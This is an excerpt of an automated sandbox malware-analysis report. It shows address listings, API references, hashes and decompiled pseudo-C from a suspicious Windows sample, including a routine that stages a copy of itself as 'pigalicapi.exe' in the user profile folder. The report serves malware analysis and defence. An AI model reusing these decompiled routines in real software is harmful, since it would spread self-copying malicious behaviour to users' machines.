                                                                                                                                                                                                                                                                                          0x04006775
                                                                                                                                                                                                                                                                                          0x0400677f
                                                                                                                                                                                                                                                                                          0x04006785
                                                                                                                                                                                                                                                                                          0x04006788
                                                                                                                                                                                                                                                                                          0x0400685c
                                                                                                                                                                                                                                                                                          0x04006861
                                                                                                                                                                                                                                                                                          0x04006864
                                                                                                                                                                                                                                                                                          0x0400678e
                                                                                                                                                                                                                                                                                          0x04006797
                                                                                                                                                                                                                                                                                          0x040067ad
                                                                                                                                                                                                                                                                                          0x040067b3
                                                                                                                                                                                                                                                                                          0x040067b9
                                                                                                                                                                                                                                                                                          0x040067c0
                                                                                                                                                                                                                                                                                          0x040067dc
                                                                                                                                                                                                                                                                                          0x040067e1
                                                                                                                                                                                                                                                                                          0x040067e7
                                                                                                                                                                                                                                                                                          0x040067f0
                                                                                                                                                                                                                                                                                          0x040067f5
                                                                                                                                                                                                                                                                                          0x040067f8
                                                                                                                                                                                                                                                                                          0x040067fe
                                                                                                                                                                                                                                                                                          0x04006804
                                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                                          0x04006819
                                                                                                                                                                                                                                                                                          0x0400681f
                                                                                                                                                                                                                                                                                          0x0400683a
                                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                                          0x04006856
                                                                                                                                                                                                                                                                                          0x0400686a
                                                                                                                                                                                                                                                                                          0x04006871
                                                                                                                                                                                                                                                                                          0x04006877
                                                                                                                                                                                                                                                                                          0x0400687a
                                                                                                                                                                                                                                                                                          0x0400687e
                                                                                                                                                                                                                                                                                          0x0400688c
                                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                                          0x04006894
                                                                                                                                                                                                                                                                                          0x0400689a
                                                                                                                                                                                                                                                                                          0x0400689d
                                                                                                                                                                                                                                                                                          0x040068a5
                                                                                                                                                                                                                                                                                          0x040068aa
                                                                                                                                                                                                                                                                                          0x040068ad
                                                                                                                                                                                                                                                                                          0x040068b9
                                                                                                                                                                                                                                                                                          0x040068bf
                                                                                                                                                                                                                                                                                          0x040068c5
                                                                                                                                                                                                                                                                                          0x040068c8
                                                                                                                                                                                                                                                                                          0x04006902
                                                                                                                                                                                                                                                                                          0x0400690a
                                                                                                                                                                                                                                                                                          0x0400690d
                                                                                                                                                                                                                                                                                          0x04006920
                                                                                                                                                                                                                                                                                          0x04006925
                                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                                          0x040068ca
                                                                                                                                                                                                                                                                                          0x040068d6
                                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                                          0x0400693a
                                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                                          0x0400694b
                                                                                                                                                                                                                                                                                          0x0400695a
                                                                                                                                                                                                                                                                                          0x04006971
                                                                                                                                                                                                                                                                                          0x04006977
                                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                                          0x0400698a
                                                                                                                                                                                                                                                                                          0x04006990
                                                                                                                                                                                                                                                                                          0x04006993
                                                                                                                                                                                                                                                                                          0x040069a1
                                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040069b0
                                                                                                                                                                                                                                                                                          0x04006667
                                                                                                                                                                                                                                                                                          0x0400666d
                                                                                                                                                                                                                                                                                          0x04006674
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006689
                                                                                                                                                                                                                                                                                          0x04006693
                                                                                                                                                                                                                                                                                          0x04006698
                                                                                                                                                                                                                                                                                          0x0400669b
                                                                                                                                                                                                                                                                                          0x040066a7
                                                                                                                                                                                                                                                                                          0x040066b8
                                                                                                                                                                                                                                                                                          0x040066c6
                                                                                                                                                                                                                                                                                          0x040066d5
                                                                                                                                                                                                                                                                                          0x040066e4
                                                                                                                                                                                                                                                                                          0x040066f0
                                                                                                                                                                                                                                                                                          0x040066ff
                                                                                                                                                                                                                                                                                          0x0400670e
                                                                                                                                                                                                                                                                                          0x0400671d
                                                                                                                                                                                                                                                                                          0x0400673a
                                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006642
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065fe
                                                                                                                                                                                                                                                                                          0x040064ae
                                                                                                                                                                                                                                                                                          0x040064b4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040064cb
                                                                                                                                                                                                                                                                                          0x040064dc
                                                                                                                                                                                                                                                                                          0x040064ed
                                                                                                                                                                                                                                                                                          0x040064f2
                                                                                                                                                                                                                                                                                          0x0400651a
                                                                                                                                                                                                                                                                                          0x0400653f
                                                                                                                                                                                                                                                                                          0x04006545
                                                                                                                                                                                                                                                                                          0x0400654c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006552
                                                                                                                                                                                                                                                                                          0x0400655c
                                                                                                                                                                                                                                                                                          0x0400657e
                                                                                                                                                                                                                                                                                          0x04006584
                                                                                                                                                                                                                                                                                          0x04006586
                                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                                          0x0400658e
                                                                                                                                                                                                                                                                                          0x04006591
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065a0
                                                                                                                                                                                                                                                                                          0x040065a6
                                                                                                                                                                                                                                                                                          0x040065b2
                                                                                                                                                                                                                                                                                          0x040065b7
                                                                                                                                                                                                                                                                                          0x040065ba
                                                                                                                                                                                                                                                                                          0x040065c0
                                                                                                                                                                                                                                                                                          0x040065c7
                                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                                          0x040065c9
                                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                                          0x04006464
                                                                                                                                                                                                                                                                                          0x0400646d
                                                                                                                                                                                                                                                                                          0x04006476
                                                                                                                                                                                                                                                                                          0x04006479
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400647b
                                                                                                                                                                                                                                                                                          0x04006c33
                                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                                          0x04006c44
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040062e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                          • String ID: TEMP$TEMP$Vatwyovatk
                                                                                                                                                                                                                                                                                          • API String ID: 2087232378-1226953995
                                                                                                                                                                                                                                                                                          • Opcode ID: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				HANDLE* _v64;
                                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                                          				HANDLE* _v104;
                                                                                                                                                                                                                                                                                          				HANDLE* _v108;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                                          				void* _t188;
                                                                                                                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                                          					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                                          					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                                          					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          					_v16 = _a24;
                                                                                                                                                                                                                                                                                          					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                                          					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t198 = _v56;
                                                                                                                                                                                                                                                                                          						if(_v56 != 0) {
                                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						ResetEvent(_v20);
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                                          						_v56 = _t114;
                                                                                                                                                                                                                                                                                          						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                                          						_v64 = _v104;
                                                                                                                                                                                                                                                                                          						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                                          						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                                          						_v100 = 0;
                                                                                                                                                                                                                                                                                          						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                                          							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                                          							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                                          							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                                          							_v68 =  &_v56;
                                                                                                                                                                                                                                                                                          							_v72 = _a12;
                                                                                                                                                                                                                                                                                          							_v92 = _a4;
                                                                                                                                                                                                                                                                                          							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                                          							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                                          								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							_t141 = CreateThread(0, 0, E04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                                          							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                                          							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                                          							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                                          							_v5 = 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						_v108 = _v64;
                                                                                                                                                                                                                                                                                          						E040097C0(_v108);
                                                                                                                                                                                                                                                                                          						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                                          						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x04004026
                                                                                                                                                                                                                                                                                          0x0400402e
                                                                                                                                                                                                                                                                                          0x0400405a
                                                                                                                                                                                                                                                                                          0x0400405f
                                                                                                                                                                                                                                                                                          0x04004066
                                                                                                                                                                                                                                                                                          0x0400406f
                                                                                                                                                                                                                                                                                          0x04004080
                                                                                                                                                                                                                                                                                          0x04004086
                                                                                                                                                                                                                                                                                          0x0400408a
                                                                                                                                                                                                                                                                                          0x0400408d
                                                                                                                                                                                                                                                                                          0x0400409f
                                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                                          0x040042bb
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                          • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                                          				long _v560;
                                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                                          				long _v568;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                                          					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                                          					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                                          					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                          					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                                          					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                                          					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                                          					_v28 = 0x207;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                                          					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v32 = _t67;
                                                                                                                                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                                          						if(_v560 > 0) {
                                                                                                                                                                                                                                                                                          							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          							_v564 = _t71;
                                                                                                                                                                                                                                                                                          							if(_v564 != 0) {
                                                                                                                                                                                                                                                                                          								_v568 = 0;
                                                                                                                                                                                                                                                                                          								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                                          								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                                          									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                                          									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CloseHandle(_v32);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04005709
                                                                                                                                                                                                                                                                                          0x04005711
                                                                                                                                                                                                                                                                                          0x04005729
                                                                                                                                                                                                                                                                                          0x04005742
                                                                                                                                                                                                                                                                                          0x04005756
                                                                                                                                                                                                                                                                                          0x0400576e
                                                                                                                                                                                                                                                                                          0x04005786
                                                                                                                                                                                                                                                                                          0x04005798
                                                                                                                                                                                                                                                                                          0x040057a3
                                                                                                                                                                                                                                                                                          0x040057b8
                                                                                                                                                                                                                                                                                          0x040057cc
                                                                                                                                                                                                                                                                                          0x040057d4
                                                                                                                                                                                                                                                                                          0x040057e4
                                                                                                                                                                                                                                                                                          0x0400580a
                                                                                                                                                                                                                                                                                          0x040057e6
                                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                                          0x0400582f
                                                                                                                                                                                                                                                                                          0x04005854
                                                                                                                                                                                                                                                                                          0x0400585a
